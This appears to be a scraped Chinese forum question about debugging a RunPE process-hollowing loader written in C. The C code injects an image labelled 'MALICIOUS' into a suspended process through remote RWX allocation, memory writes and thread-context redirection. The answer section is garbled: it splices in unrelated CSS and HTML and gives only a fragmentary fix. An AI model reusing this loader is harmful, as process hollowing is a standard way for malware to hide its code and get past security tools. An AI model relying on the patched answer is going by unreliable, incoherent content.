问题描述
我正在尝试使用RunPE技术(用于学习)。
首先,我在Windows XP(32位)上尝试了此操作,没有出现任何错误,但注入的代码(HelloWorld)并没有运行。
然后,我尝试在Windows 7和10(64位)上使用它,并在线程恢复时收到此错误[0xc00000005]。为什么会出现此错误,为什么注入的代码无法在XP计算机上运行?
我也尝试过取消映射映像基址(0x00400000),但遇到了同样的问题。
我的代码:
/*
 * runPe - copy the in-memory PE image pointed to by `image` into a newly
 * created, suspended copy of the current executable and redirect that
 * process's initial thread to the copied entry point.
 *
 * This is the "RunPE" / process-hollowing sequence:
 *   CreateProcessA(CREATE_SUSPENDED) -> GetThreadContext ->
 *   VirtualAllocEx / WriteProcessMemory into the child ->
 *   SetThreadContext -> ResumeThread.
 * Every step is a cross-process operation; a remote RWX allocation followed by
 * remote writes and a context change on a suspended primary thread is a
 * well-known host-monitoring (ETW / EDR) detection pattern.
 *
 * Parameters:
 *   image - pointer to a PE file image already in memory. No length is passed,
 *           so e_lfanew, NumberOfSections, PointerToRawData and SizeOfRawData
 *           are used as-is; a truncated or malformed image reads outside the
 *           buffer.
 *
 * Returns 0 once the child thread has been resumed, -1 on a reported failure.
 * Note: if CreateProcessA itself fails the function falls through to
 * `return 0` without reporting anything, and on every -1 path the suspended
 * child process and its handles are left open (there is no TerminateProcess
 * or CloseHandle anywhere in this function).
 *
 * NOTE(review): several Win32 calls below have fewer arguments than their
 * prototypes take; presumably the listing was damaged when pasted — confirm
 * against the original source before reading the argument positions literally.
 */
int runPe(void* image) {
IMAGE_DOS_HEADER* dosHeader;
IMAGE_NT_HEADERS* ntHeader;
IMAGE_SECTION_HEADER* sectionHeader;
CONTEXT* ctx;
PROCESS_INFORMATION pinfo;
STARTUPINFO sinfo;
int i;
DWORD* ImageBase = NULL;
void* pImage = NULL;
char currentpath[1024];
GetModuleFileNameA(0,currentpath,1024); //path to the current exe (the child is a copy of it)
//Locate the DOS and NT headers of the image to inject.
//e_lfanew is taken from the buffer unchecked (no size is known here).
dosHeader = (PIMAGE_DOS_HEADER)(image);
ntHeader = (PIMAGE_NT_HEADERS)((DWORD)image + dosHeader->e_lfanew);
//Only the NT signature is validated; no other header field is range-checked.
if (ntHeader->Signature == IMAGE_NT_SIGNATURE) {
ZeroMemory(&pinfo,sizeof(pinfo));
ZeroMemory(&sinfo,sizeof(sinfo));
//Child starts with its primary thread suspended, so it has not executed
//any of its own code when the writes below happen.
if (CreateProcessA(currentpath,NULL,FALSE,CREATE_SUSPENDED,&sinfo,&pinfo)) {
printf("[*] Suspended process is created\n");
Sleep(600); //the Sleep calls only pace the console output; nothing is synchronized on them
//Allocate memory for the context of the suspended process
ctx = (LPCONTEXT)(VirtualAlloc(NULL,sizeof(ctx),MEM_COMMIT,PAGE_READWRITE));
if (ctx) {
ctx->ContextFlags = CONTEXT_FULL;
printf("[*] Context is allocated successfully\n");
Sleep(600);
//Get the thread context of the suspended primary thread.
//Ebx/Eax below are the x86 register fields of CONTEXT.
if (GetThreadContext(pinfo.hThread,(LPCONTEXT)ctx)) {
printf("[*] Allocating MALICIOUS image headers into the suspended process\n");
Sleep(600);
//Reads 4 bytes of the child at ctx->Ebx + 8 into ImageBase.
//ImageBase is never referenced again after this line.
ReadProcessMemory(pinfo.hProcess,(LPCVOID)(ctx->Ebx + 8),(LPVOID)(&ImageBase),4,0);
//Remote allocation of SizeOfImage bytes as PAGE_EXECUTE_READWRITE:
//an RWX region in another process is itself a strong monitoring indicator.
pImage = VirtualAllocEx(pinfo.hProcess,ntHeader->OptionalHeader.SizeOfImage,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);
if (pImage) {
printf("[*] Allocating memory for MALICIOUS image headers into the IMAGE_BASE\n");
Sleep(600);
//Copy the headers (SizeOfHeaders bytes) to the start of the remote region.
if (WriteProcessMemory(pinfo.hProcess,(LPVOID)pImage,image,ntHeader->OptionalHeader.SizeOfHeaders,NULL)) {
printf("[*] Writing memory for MALICIOUS image headers into the IMAGE_BASE\n");
Sleep(600);
//sectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)image + dosHeader->e_lfanew + sizeof(IMAGE_NT_HEADERS));
//Copy each section's raw data to its VirtualAddress inside the remote region.
//The literal 248 stands in for the sizeof(IMAGE_NT_HEADERS) used by the
//commented-out line above; presumably the 32-bit header size.
for (i = 0; i < ntHeader->FileHeader.NumberOfSections; i++)
{
sectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)image + dosHeader->e_lfanew + 248 + (i * sizeof(IMAGE_SECTION_HEADER)));
//00000000 is an octal literal, i.e. plain 0: skip sections with no raw data.
if (sectionHeader->SizeOfRawData == 00000000)
continue;
//PointerToRawData / SizeOfRawData come straight from the image and are not
//checked against any buffer length.
if (WriteProcessMemory(pinfo.hProcess,(LPVOID)((DWORD)(pImage) + sectionHeader->VirtualAddress),(LPVOID)((DWORD)image + sectionHeader->PointerToRawData),sectionHeader->SizeOfRawData,0))
{
printf("[*] Allocating memory for Section %d at %X\n",i,(LPVOID)((DWORD)pImage + sectionHeader->VirtualAddress));
Sleep(600);
}
else
{
//GetLastError returns DWORD; %d reads it as a signed int.
printf("ERROR: Writing section (%d) into memory failed\n",i);
printf("Error Code: %d\n",GetLastError());
return -1; //child stays suspended and its handles stay open
}
}
//Overwrite the 4 bytes at ctx->Ebx + 8 in the child (the location read above)
//with the injected image's ImageBase.
if (WriteProcessMemory(pinfo.hProcess,(LPVOID)(ctx->Ebx + 8),(LPVOID)(ntHeader->OptionalHeader.ImageBase),0)) {
printf("[*] Image base address is changed to MALICIOUS\n");
Sleep(600);
//Point the thread's Eax at the copied entry point (pImage + AddressOfEntryPoint).
ctx->Eax = (DWORD)pImage + ntHeader->OptionalHeader.AddressOfEntryPoint;
printf("[*] AddressOfEntryPoint is changed to MALICIOUS\n");
Sleep(600);
//Apply the modified context and let the thread run; the return value of
//SetThreadContext is not checked, so a failed context write still resumes.
SetThreadContext(pinfo.hThread,(LPCONTEXT)ctx);
ResumeThread(pinfo.hThread);
printf("[*] Thread is resumed\n");
}
else
{
printf("ERROR: Change the imageBase address from the suspened process into the MALICIOUS failed\n");
printf("Error Code: %d\n",GetLastError());
return -1; //child stays suspended and its handles stay open
}
}
else
{
printf("ERROR: Writing the image into the process address space failed\n");
printf("Error Code: %d\n",GetLastError());
return -1; //child stays suspended and its handles stay open
}
}
else
{
printf("ERROR: Allocating memory for MALICIOUS image headers into the IMAGE_BASE failed\n");
printf("Error Code: %d\n",GetLastError());
return -1; //child stays suspended and its handles stay open
}
}
else
{
printf("ERROR: GetThreadContext failed\n");
printf("Error Code: %d\n",GetLastError());
return -1; //child stays suspended and its handles stay open
}
}
else
{
printf("ERROR: Context allocation failed\n");
printf("Error Code: %d\n",GetLastError());
return -1; //child stays suspended and its handles stay open
}
}
//Reached both after a successful resume and when CreateProcessA failed
//(no else branch reports that failure).
return 0;
}
else
{
//No Win32 call failed here, so GetLastError does not describe the signature
//mismatch; it reports whatever the last API call left behind.
printf("ERROR: Invalid nt SIGNATURE\n");
printf("Error Code: %d\n",GetLastError());
return -1;
}
}
解决方法
现在可以正常运行了。我认为错误出在把映像基址改为注入代码的那一步。
我认为错误在这里:
#block {
position:relative;
}
.pLined {
position:relative;
}
.pLined > span {
display:block;
}
#div {
position:absolute;
display:none;
color:white;
background-color:rgba(255,0.75);
top:auto;
left:auto;
z-index:1;
}
#div.toLine {
display:block;
}
已修改(错误在于指向映像缓冲区的指针不正确)
<div id="block">
<p class="pLined">
<span>Line 1 Text</span>
<span>Line 2 Text</span>
<span>Line 3 Text</span>
<span>Line 4 Text</span>
<span>Line 5 Text</span>
</p>
<button id="btn">Div</button>
<div id="div"></div>
</div>
,然后使用NtUnmapViewOfSection取消映射映像基址:
if (WriteProcessMemory(pinfo.hProcess,(LPVOID)(ctx->Ebx + 8),(LPVOID)(ntHeader->OptionalHeader.ImageBase),4,0))